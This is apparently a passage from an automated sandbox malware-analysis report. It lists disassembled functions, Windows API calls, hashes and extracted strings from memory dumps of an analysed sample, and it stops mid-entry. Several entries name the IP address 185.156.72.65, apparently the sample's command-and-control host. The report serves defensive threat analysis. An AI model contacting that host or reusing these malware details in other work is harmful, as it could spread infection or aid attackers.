                      • API String ID: 1740715915-0
                      • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                      • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                      • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                      APIs
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • GetLastError.KERNEL32 ref: 049577AF
                      • __dosmaperr.LIBCMT ref: 049577B6
                      • GetLastError.KERNEL32(?,?,?,?), ref: 049577F0
                      • __dosmaperr.LIBCMT ref: 049577F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: ff8533bfb572cb16cd7e42a707f9002909eb208d62e8c759a9d0a38b944d5ae3
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 87218675600615AFEB11EFA1D880D6A77ADFF84268B208579ED1997260D731FD00C760
                      APIs
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • GetLastError.KERNEL32 ref: 00417548
                      • __dosmaperr.LIBCMT ref: 0041754F
                      • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                      • __dosmaperr.LIBCMT ref: 00417590
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                      • String ID:
                      • API String ID: 1913693674-0
                      • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                      • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                      • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: a45ec91265a130491ca744ceba9d666514f598402c535a81d2d6f777d8ba8db7
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: E8219375A04205AFEB20EF65DC81E7B77AEAF842687204935FD1A97170E774FC4287A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,049536EF,0494381E,?,00000000,04942AA0,04942AA2,?,04953868,00000022,00420B0C,00422950,00422958,04942AA0), ref: 049536A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: dc75c547a42f12a9f289368585f08454ecf7689698170e341f7030a169091c8b
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: F821C331A02611ABC731DB65EC42A5A7BA99B427E0B254238ED06A73B1DB30FD05C794
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 049586F4
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495872C
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495874C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: da794a8fd2d3a790ccbef012f21260be0a07f8a954a768ae26b22ec8f6b15c65
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 03118EB66015197EA721FB765C88CAF2EADCEC91A87210534FD06A1120FA60FE1287B5
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000), ref: 0495CEA6
                      • GetLastError.KERNEL32(?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000,?,0495A2C8,?), ref: 0495CEB2
                        • Part of subcall function 0495CE78: CloseHandle.KERNEL32(0042CA30,0495CEC2,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000), ref: 0495CE88
                      • ___initconout.LIBCMT ref: 0495CEC2
                        • Part of subcall function 0495CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0495CE69,0495CAF3,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CE4D
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CED7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 89c4c1b7f98522a9b69b08b15cfafe70a43135fa4217921e32848bd1af09b4f5
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: B8F0303A540258BBCF229FD5EC08ACE3F26FF486A1B518030FE1996130D732AC259BD4
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                      • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                        • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                      • ___initconout.LIBCMT ref: 0041CC5B
                        • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                      APIs
                      • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                      • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                      • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                      • String ID:
                      • API String ID: 3269011525-0
                      • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                      • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                      • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                      APIs
                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                      • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                      • String ID: vector too long
                      • API String ID: 3646673767-2873823879
                      • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                      • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                      • Instruction ID: 6bac89f4c7e33a04f657778c2992a3de6e6d48541dc9823201a7925d004e0823
                      • Opcode Fuzzy Hash: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                      • Instruction Fuzzy Hash: 71518071D002099FEB18CFE8C894FEEB7B9FB88304F508569E515A7680D775A545CBA0
                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0494BAA6
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0494BB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 3480331319-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: f8fd4814fa1228670a746e36af1c5dbbd4f4a5f8c078400c8c653d4389a200f2
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 1941A130A00219AFDF10DF69C884EAEBBF5AF85328F148575E8146B3A5D731FA15CB90
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 0494C32C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: c4ba9752dcd84c22c44dd6542354d8036f89c1105082fda42e1d9e8fd5a27bc6
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: B1414872901209AFDF16CF98C980EEEBBB9BF88304F158169F914A7225D735A950DF50
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 0494150B
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction ID: 98aa35c248c7357362b975aeb6d892297c345811a15bf566927ec248ad7140a2
                      • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction Fuzzy Hash: 132126B0F002059EDB24EFB8E919BA97BB0FF85308F9041B9C4139B2A1D7757545CB59
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049412EB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction ID: 3d756ea9ba8b64fd540d48becca53452bae07eee396b8f7b50ee9fca1bafdc03
                      • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction Fuzzy Hash: 69216BB0F002459EDB14EFB8E919FA97BB0FB81308F9001B9E44567350D7B56589CB5D
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049413FB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction ID: 39467b310fd79930c8b0e99fb2bed8e03df8f1992097a7dfc7e1b35ffb2f80bf
                      • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction Fuzzy Hash: 722129B0F002449EDB24EFB4E929BA97BB0FF81308F9001B9D80557251D7B57585CB59
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401084
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                      • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401194
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                      • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004012A4
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                      • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948755
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction ID: ced717938db960ffb86bfc66e2cb81337620bd3240a0c6bb8509d39509613d49
                      • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction Fuzzy Hash: 210126B0F00244DFCB10EFB8EC40D6AB7A0A799310BA04179D536AB290DB35B8018B05
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948155
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
